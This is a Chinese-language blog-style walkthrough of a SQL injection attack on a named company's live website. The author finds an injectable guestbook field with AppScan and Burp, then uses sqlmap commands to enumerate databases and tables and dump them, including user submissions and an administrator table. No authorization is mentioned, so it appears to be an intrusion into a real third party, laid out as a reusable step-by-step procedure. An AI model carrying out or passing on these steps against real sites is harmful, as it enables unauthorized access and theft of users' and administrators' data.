1
此处附上网址 广东京溪园罐头食品有限公司
此网页功能并不是很多,先拿APPscan全盘扫一遍,漏洞确实不少
由于五个参数均有注点,任一点开一个找一下referer字段顺藤摸瓜来确定上一个请求网页
发现这个留言框 然后打开burp抓包验证一下是否是appscan测试出的注点(看一看请求包内容是否一致)
接下来改包测试 这里改一下name(post注入常用手法 'havingh 1=1)然后放包
直接报错,整条插入语句连带表wh_47book完全暴露,手工测试到这里已经完全OK,接下来sqlmap跑一波
由于post注入,点击copy to file直接生成数据包 并命名1.txt 放在本机sqlmap目录下
打开sqlmap 输入sqlmap.py -r 1.txt测试是否可自动注入
接下来开始爆库 输入sqlmap.py -r 1.txt --dbs
接下来爆表 输入sqlmap.py -r 1.txt -D jingxiyuan_sunbo --tables
sqlmap.py -r 1.txt -D jingxiyuan_sunbo -T 数据表名 --dump (爆出全部数据)
数据储存在我C:\Users\AA\AppData\Local\sqlmap\output\www.jxygt.com\dump\jingxiyuan_sunbo
经过信息筛选发现了我们最初爆出的数据表wh47_book.csv 此表为用户提交的信息,
wh47_manage表为管理员信息表
由于db权限不是dba,没办法os-shell,测试到此为止,由于水平有限,没能找到后台继续getshell,算是有收获也有遗憾吧,
另外 appscan扫出的另外两个高危漏洞,个人认为不算高危,毕竟为post型,实现条件比较艰难,需要抓包改包弹出错误页面进一步才可以产生钓鱼,不像get型直接在后边参数附一个恶意网站链接就可以达到钓鱼目的,由此可见,这两个漏洞自评为低危,危害性不大,此处不再做具体演示,如有问题请及时指出,谢谢!